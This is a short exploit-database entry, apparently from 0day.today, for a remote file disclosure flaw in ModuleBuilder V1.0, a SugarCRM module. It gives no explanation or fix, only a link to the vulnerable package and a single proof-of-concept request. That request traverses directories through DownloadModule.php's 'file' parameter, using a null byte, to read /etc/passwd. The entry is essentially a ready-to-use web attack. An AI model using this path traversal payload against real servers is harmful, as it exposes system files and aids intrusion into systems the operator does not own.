id: 2260
date: 10/31/2007
title: ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
author: GoLd_M
cves: 

==============================================================
ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
==============================================================


ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip
/modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #